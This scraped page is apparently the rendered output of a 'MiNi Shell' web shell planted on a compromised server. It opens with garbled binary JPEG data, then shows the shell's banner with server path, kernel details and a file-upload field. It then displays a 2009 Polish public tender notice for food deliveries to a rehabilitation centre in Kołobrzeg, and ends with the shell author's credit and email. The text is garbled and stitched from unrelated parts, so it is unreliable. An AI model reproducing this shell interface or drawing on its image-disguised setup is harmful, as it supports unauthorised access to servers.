JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090507/137324-N-2009.html

<p class="kh_header"><b>Kołobrzeg: Okresowe dostawy artykułów spożywczych dla Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego NIWA w Kołobrzegu</b><br>
<b>Numer ogłoszenia: 137324 - 2009; data zamieszczenia: 07.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego "Niwa" , C. K. Norwida 3, 78-100 Kołobrzeg, woj. zachodniopomorskie, tel. 094 3552010, faks 094 3552011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.niwa.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Okresowe dostawy artykułów spożywczych dla Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego NIWA w Kołobrzegu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są okresowe dostawy artykułów spożywczych dla Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego NIWA w Kołobrzegu zgodnie z załączonymi formularzami zestawienia dostaw, które stanowią załączniki nr 1 i nr 2 do Specyfikacji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6, 15.90.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w wysokości 5.000,00 zł, w terminie do dnia  
    18 maja 2009 r. do godz. 10.30.
2. Wadium można wnieść w jednej z następujących form: pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
3. Wadium w pieniądzu należy wpłacić na konto Zamawiającego:
BGŻ SA Oddział Kołobrzeg 73 2030 0045 1110 0000 0049 3200 
z adnotacją:wadium w postępowaniu na okresowe dostawy artykułów spożywczych. Dowodem wniesienia wadium może być potwierdzony odcinek wpłaty lub potwierdzony przez bank odcinek polecenia dokonania przelewu lub potwierdzony przez Wykonawcę inny dokument potwierdzający dokonanie wpłaty kwoty wadium załączony do oferty. Wadium musi być wpłacone na tyle wcześnie, aby w terminie składania ofert kwota wadium znajdowała się na rachunku bankowym Zamawiającego.
4. W przypadku wadium wnoszonego w innych formach niż pieniądz, należy oryginał dokumentu umieścić w odrębnej kopercie opatrzonej dopiskiem WADIUM i złożyć wraz z ofertą lub zdeponować dokument wadium przed upływem terminu składania ofert w kasie Zamawiającego. 
	W przypadku wnoszenia wadium w formie gwarancji ubezpieczeniowej lub bankowej, ważność wadium wymagana jest na okres związania ze składana ofertą.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy którzy:
1.Posiadają uprawnienia do wykonywania określonej działalności 
lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego  i osób zdolnych do wykonania zamówienia.
3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej 
wykonanie zamówienia. 
4.Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 
i ust. 2, ustawy Prawo Zamówień Publicznych.
oraz spełnią warunki dodatkowe:
   5.  Dysponują transportem dopuszczonym przez SANEPID do przewozu artykułów spożywczych;
   6.  Posiadają wdrożony system HACCP
   7.  Do każdej dostawy załączą dokument HDI
   8.  Posiadają umowę ubezpieczenia od odpowiedzialności cywilnej z tytułu prowa	dzonej działalności gospodarczej na sumę nie niższą w zakresie OC niż 	251.000,00 PLN.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty należy załączyć następujące dokumenty: 

1. Oświadczenie określone w art. 22 ust. 1 w powiązaniu z art. 24. 1 ustawy 
Prawo o Zamówieniach Publicznych /t.j. - Dz. U. nr 223 poz. 1655 z 2007 r. z późn. zm./ zgodnie ze wzorem stanowiącym załącznik nr 3 lub 3a i 3b do niniejszej Specyfikacji.

2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 
miesięcy przed upływem terminu składania ofert /lub dokument potwierdzony w tym terminie przez organ wydający/.

3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium  
 Rzeczypospolitej Polskiej:
1) zamiast dokumentu wymienionego w pkt. 2 niniejszego rozdziału SIWZ składa dokument lub dokumenty, wystawione w kraju, w którym ma 
siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie
2) Dokumenty, o których mowa w podpunkcie 1) powinny być wystawione  
    nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
  3) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce 
          zamieszkania nie wydaje się dokumentów, o których mowa wyżej, moż	 na je zastąpić  dokumentem zawierającym oświadczenie Wykonawcy 
  złożone przed notariuszem, właściwym organem sądowym,
   administracyjnym albo organem samorządu zawodowego lub 
      gospodarczego kraju, w którym dana osoba ma siedzibę lub miejsce
          zamieszkania. Dokumenty, o których mowa wyżej, powinny być złożone	 w języku polskim. Wszelkie dokumenty dołączone w języku innym niż  
     język polski powinny być załączane wraz z tłumaczeniem na    
      	 język polski, poświadczonym przez Wykonawcę. 
4. Dokument potwierdzający dopuszczenie samochodów przez SANEPID do przewozu artykułów spożywczych.
5. Oświadczenie Wykonawcy o zobowiązaniu się do przedłużenia decyzji wydanej przez Inspekcję Sanitarną w zakresie dopuszczenia środków transportu do przewozu artykułów spożywczych na okres trwania umowy, na co najmniej jeden tydzień przed wygaśnięciem terminu ważności decyzji.
6. Dokument potwierdzający wdrożenie systemu HACCP.
7. Potwierdzenie (w formie oświadczenia) możliwości realizowania zamówień codziennie na podstawie zamówienia  wyprzedzającego je o 24 h, a w sytuacjach wyjątkowych nawet tego samego dnia oraz zaopatrywania dostarczanych produktów w czytelne etykiety z opisem produktu, terminem ważności, temperaturą przechowywania oraz numerem partii a także załączania dokumentów HDI.
8. Potwierdzenie (w formie oświadczenia) dostarczania zamówionych towarów w uzgodnionych terminach na swój koszt i ryzyko.
9. Umowę ubezpieczenia od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej na sumę nie niższą w zakresie OC niż 251.000,00 PLN.
10. Oświadczenie, że w przypadku wygaśnięcia ubezpieczenia oraz na każde żądanie Zamawiającego przedstawi przedłużoną polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę nie niższą w zakresie OC niż 251.000,00 PLN na co najmniej jeden tydzień przed wygaśnięciem umowy ubezpieczenia, o ile wygaśnięcie to nastąpi w okresie trwania umowy, pod rygorem natychmiastowego rozwiązania umowy z winy Wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.niwa.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego NIWA w Kołobrzegu, 78-100 Kołobrzeg ul. C.K. Norwida 3.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2009 godzina 10:30, miejsce: Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego NIWA w Kołobrzegu, 78-100 Kołobrzeg ul. C.K. Norwida 3 - sekretariat..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com